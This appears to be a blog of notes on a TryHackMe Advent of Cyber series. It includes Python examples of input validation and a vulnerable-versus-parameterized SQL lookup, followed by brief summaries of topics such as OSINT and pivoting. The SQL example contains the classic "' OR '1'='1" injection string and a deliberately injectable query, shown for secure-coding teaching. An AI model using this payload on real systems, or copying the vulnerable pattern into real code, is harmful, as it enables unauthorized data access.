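        delivery = date.fromisoformat(date_raw)     # "2024-02-30" matches the regex but is not a date
    except ValueError:
        errors["delivery_date"] = "not a real date"
    else:
        if not (today < delivery <= today + timedelta(days=90)):
            errors["delivery_date"] = "must be within the next 90 days"

    # 3. Filtering: a value that reaches the query builder must be on the allow-list,
    #    so an unexpected (even syntactically fine) name never becomes part of SQL.
    if sort_raw not in ALLOWED_SORT:
        errors["sort_by"] = "unknown sort field"
    if errors:
        return None, errors
    return {"quantity": quantity, "delivery_date": delivery, "sort_by": sort_raw}, {}


if __name__ == "__main__":
    for form in ({"quantity": "3", "delivery_date": "2024-12-20", "sort_by": "price"},
                 {"quantity": "-1", "delivery_date": "2024-12-20"},
                 {"quantity": "3", "delivery_date": "2024-02-30"},
                 {"quantity": "3", "delivery_date": "2024-12-20", "sort_by": "owner"}):
        print(form, "->", validate_order(form))
```

Ordering the stages matters: the semantic check calls `int()` and `date.fromisoformat()` on values the syntax stage has already confined to a safe shape, so those calls can never be handed something surprising.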
Secure Coding: SQLi’s the king, the carolers sing
SQL is the traditional language used to query DBs. Any app that relies on a DB needs to create SQL sentences on the fly to retrieve information. SQL syntax is supposed to resemble straightforward English sentences.
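As an added example of what "creating SQL sentences on the fly" looks like when done wrongly and when done right (not code from the original post or TryHackMe), the two functions below answer the same lookup against an in-memory SQLite table with constructed rows. The first pastes the input into the sentence, so an input that closes the quote early gets to finish the sentence itself; the second keeps the sentence fixed and passes the value as a bound parameter, so the same input is merely compared against the column and matches nothing.

```python
import sqlite3


def setup_db():
    """In-memory database with constructed rows, standing in for the app's DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("santa", "santa@example.invalid"), ("elf", "elf@example.invalid")])
    return conn


def find_user_vulnerable(conn, username):
    """Builds the SQL sentence by string formatting. The input can end the quoted
    literal and continue the WHERE clause, changing what the sentence means."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """The sentence is fixed at write time; the value travels separately as a
    bound parameter, so whatever it contains is compared, never parsed as SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# The textbook always-true input, used here only to show the two behaviours diverge.
TAUTOLOGY = "' OR '1'='1"


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable, normal input:", find_user_vulnerable(conn, "santa"))
    print("vulnerable, tautology:   ", find_user_vulnerable(conn, TAUTOLOGY))   # every row leaks
    print("safe, tautology:         ", find_user_safe(conn, TAUTOLOGY))         # no such user
```

The fix is not escaping quotes by hand but keeping data out of the sentence altogether, which is what parameter binding does and why every mainstream database driver offers it.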
Secure Coding: Santa is looking for a Sidekick
Another security concern for web apps is insufficient input validation. Occurs when user-provided input is inherently trusted by the application. I think I know where this is going. SQL Injection, Cross Site Scripting, and Unrestricted File Upload stem from this issue. UFU can allow an attacker to host and/or serve illegal content or leak sensitive information. Usually has two main paths:
Web Applications: I’m dreaming of secure web apps
Can’t talk webapps without talking databases. Two popular database models:
Packet Analysis: Simply having a wonderful pcap time
Ran out of time to do a separate task and post yesterday. Only had enough time to finish off Task 17 from Monday.
Malware Analysis: Forensic McBlue to the REVscue
Malware has typical patterns allowing easier identification and providing insight for defenses.
Memory Forensics: Not all gifts are nice
Note: Two days later I realized I forgot to rename this and the next posts in the front-end. Fitting for a memory-centric task.
Hack a Game: You’re a mean one, Mr. Yeti
I think I tripped over a rock and died.
Pivoting: Dock the halls
A common way to tell if a compromised application is running in a Docker container is checking whether the root dir has /.dockerenv.
Smart Contracts: Last Christmas I gave you my ETH
First, before anything else, based on the title there is no way I’m watching the walkthrough video lest I be suckered into losing Whamageddon. Sneaky tip to MWRSecurity, if you don’t already have Wham’s Last Christmas playing quietly in the background, you should reshoot the video with it on a loop.
CyberChef: Maldocs roasting on an open fire
Had to skip yesterday’s challenge and post, so they’re doubled today. I kept a simple question in the wings to keep the streak alive though. Glad for this one because I’m always looking for a fun reason to use CyberChef.
Email Analysis: It’s beginning to look a lot like phishing
Two main concerns in email analysis:
Brute-Forcing: He knows when you’re awake
Scanning: Scanning through the snow
Two types of scanning based on the intrusiveness of info gathering:
OSINT: Nothing escapes detective McRed
OSINT - gathering and analysing publicly available data for intel purposes. Sources include the internet, mass media, specialist journals and research, photos, and geospatial information. Accessed via the open internet (indexed by search engines), closed forums (not indexed by search engines), and the deep and dark web.
Log Analysis: Santa’s Naughty & Nice Log
Windows logs are available through Event Viewer.
Frameworks: Someone’s coming to town!
Frameworks refers to security frameworks, in this case namely the NIST Cybersecurity Framework, the ISO 27000 series of standards, the MITRE ATT&CK framework, the Cyber Kill Chain, and the Unified Kill Chain.
I started trying to get this site up and running after last year’s AoC event. I had a good streak going, was learning all sorts of stuff, and wanted to keep better track of it than random notes and pages in various notebooks. Unfortunately I could never get it up and running, then I lost my streak and my desire. With AoC kicking off again in a few hours I wanted to try and get it running again.